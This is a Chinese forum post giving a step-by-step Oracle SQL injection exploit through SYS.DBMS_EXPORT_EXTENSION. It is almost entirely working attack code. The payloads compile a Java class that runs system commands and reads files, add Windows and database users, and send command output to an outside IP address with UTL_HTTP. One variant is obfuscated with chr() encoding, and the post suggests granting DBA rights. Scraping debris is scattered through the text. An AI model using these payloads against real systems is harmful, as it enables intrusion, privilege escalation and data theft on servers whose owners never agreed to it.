以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 * W3 i" L4 v2 ]0 H6 F% t
" x& r/ b' {' f7 b# t+ a; N
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
5 z9 f6 S2 \0 Q3 m的形式即可。(用" 'a'|| "是为了让语句返回true值)
}& ~+ j/ g1 U语句有点长,可能要用post提交。 8 q; ]# S) [' y$ _6 J
以下是各个步骤:
" Z8 V G- y7 A4 f. C" @1.创建包
* ~; F+ S: _ P: Y2 ]/ Y5 O通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:# i1 _; o$ X" o& F9 r
/xxx.jsp?id=1 and '1'<>'a'||( ( k1 r3 }; N' K; S- W& F: O ^
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ B1 y& J6 b7 u k2 P9 k. k% Zcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader($ V- Y T; [7 ?8 s6 O
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
0 H% Q9 |! n, u; l |}'''';END;'';END;--','SYS',0,'1',0) from dual
0 n2 Q, e# C7 y: {" e3 H2 u)
, c' l+ T, G s------------------------ 6 s8 s' i5 {; q: O) N* E/ l* _
如果url有长度限制,可以把readFile()函数块去掉,即:
3 p( R" ?6 C6 Q0 J0 L/xxx.jsp?id=1 and '1'<>'a'||(
, C. m$ G* Y* cselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''4 Z6 ]5 a7 d _9 B" q7 |
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
9 h( N0 m6 _# x% `new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
& D, t# W4 h2 L9 T5 S+ |. c; @% G2 E}'''';END;'';END;--','SYS',0,'1',0) from dual 5 F( U& y7 v- X- F; {3 y
)
9 }6 u0 M* _5 v' r同时把后面步骤 提到的 对readFile()的处理语句去掉。 : r9 S4 `' a- U, h+ o
------------------------------
7 F' I, |; R: h4 W" \2.赋Java权限
: R% u0 S5 p2 R0 l$ q7 Jselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual ]3 a. `8 h z! z
3.创建函数
! j F$ L! ~# mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
) D& ~, O8 N, i9 @create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual: G% _! G9 f% f ]! ~
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
, Q0 u4 ^- f( W# N: [/ }create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual) s) X$ @% f7 { r6 F3 x( N9 y
4.赋public执行函数的权限
% B& J, E( Y) Z& \) H C5 rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
1 c* a& M5 P R- Y `) f" ~select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
! n- F/ O1 h, l5 ~5 v5.测试上面的几步是否成功
6 c$ F8 w8 M" L. \1 b' |8 K' U5 m$ wand '1'<>'11'||( ' B v2 P; n4 i6 m, y
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
/ w+ n5 W( ^* N% p)
8 v6 P2 r9 d$ s+ F+ Jand '1'<>(
$ M! h; T. _/ Z" m. P$ Bselect OBJECT_ID from all_objects where object_name ='LINXREADFILE'
4 J/ G" G1 o$ ^$ e1 U)
0 g0 i7 @, ]( d' Q* J6.执行命令: 3 c1 t( I( d8 C7 I+ B1 G/ U( s
/xxx.jsp?id=1 and '1'<>(
- \* p+ T2 F5 M4 q+ Yselect sys.LinxRunCMD('cmd /c net user linx /add') from dual # u8 ?' ~' t6 ?, ]5 r4 [. w
& Q5 S% x' B7 X& Y
) & Z8 I+ A+ }! f! T$ Q# |
/xxx.jsp?id=1 and '1'<>(
! m3 u! x8 L: v: vselect sys.LinxReadFile('c:/boot.ini') from dual. [" O0 M6 E4 s) e4 a1 {
) _8 R$ I2 l* W* f
)
( E7 @1 p" _: a+ C7 ~
1 |$ V& E! D p2 R l% g \! |注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
" S1 I/ L* t0 | K- [6 J6 N如果要查看运行结果可以用 union : , x* f$ D5 B: N
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
; ~2 o* z' R. ~0 `+ l8 F6 q6 K或者UTL_HTTP.request(:
% ]" X2 ?: |7 V5 ]% y/ ]/xxx.jsp?id=1 and '1'<>(
/ |, y9 c1 a4 G0 ^8 `, o; ySELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual; L- q+ u( a+ t( h# I
)
- E4 B& ]4 P& | e0 C/xxx.jsp?id=1 and '1'<>( 4 m4 I" k& E- Z0 x( M# E9 U
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
! x" v) a) Q" N% n) 7 l" g/ ?2 b" E+ X0 V9 N; t
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。/ e9 j9 E/ Z* g0 t6 \
--------------------
6 { a: x- A# Z$ ]0 F( A% M! N6.内部变化
9 P, Z7 ]& f7 P, Y/ Z( A通过以下命令可以查看all_objects表达改变: 1 F8 h( ?6 `. d
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%' J, \) v7 ?( l! U
7.删除我们创建的函数 - d: A# w4 e3 M# ~- A: m- _/ W
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''* U1 l8 b3 t1 |3 p" I9 B0 O# `
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
A0 }; f4 k# J6 s1 {: s==================================================== 7 C, b: s2 N3 q, H+ l8 |
全文结束。谨以此文赠与我的朋友。 ' }3 B1 z: }* W4 x+ `
linx
( |& c* u# k G( d. J( _. g5 q7 j4 N124829445 2 [2 q$ R# Z& j) N" C, @6 X
2008.1.12 6 P8 j6 T) f7 x* q8 D0 {1 D4 x
linyujian@bjfu.edu.cn # V+ c3 B$ q. L# `8 p
====================================================================== * _4 n& @) @" g/ v5 Y k
测试漏洞的另一方法:
% c* O/ ?: z9 i3 r. \创建oracle帐号: / e: M8 g- Q, v% L" r" N# N
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
6 J* w) N8 G* ]% A4 V5 K1 ^CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
i0 O: A ]3 f* C7 L4 c+ ]: s& z即:
8 V+ W# i+ a0 @* I9 s% D9 qselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
9 ]# d3 \, Q, W A7 ]7 qchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual ?! d, I$ {/ A$ W8 k& w: q
确定漏洞存在: 1 w. R" W0 z* f( Z! G
1<>(
+ v+ e% L ^) s% o- o& B; Cselect user_id from all_users where username='LINXSQL' , L, J+ l5 ~% L" ?1 K: p3 y
)
6 f! L7 ^$ _- u$ W5 X5 z+ A. N给linxsql连接权限:
5 c. P) F* j6 ^7 d) A& A; Yselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 G" O' S$ Q( q- e4 o# N7 T' TGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
% V- g, A! Z9 j1 C: S" ~# v删除帐号:
. x) H5 S7 C0 l u0 G* Bselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 F2 e* }8 D$ @* v/ Fdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual 8 A1 z. m Y* m2 m1 v
====================== 4 ^- T. ~3 t( T6 ^- A
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:* h& Z' O' z) }% E3 Z
1.jsp?id=1 and '1'<>( * t9 M" b u* d8 _" L% @* u5 @ r
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''0 Q3 O$ B: B1 x* U9 c
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
$ @ s1 _8 m* l3 P) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE- f6 V) _/ J9 v4 D: r" @# \! I
)8 d% H, |, Q* i
( a* l( `( v/ T$ j
7 F w+ n0 |* q8 d/ @5 v- r9 c) z2 ~4 \2 x5 U6 W2 P$ ]) g
|
发表于 2012-12-18 12:21:48
收藏
支持
反对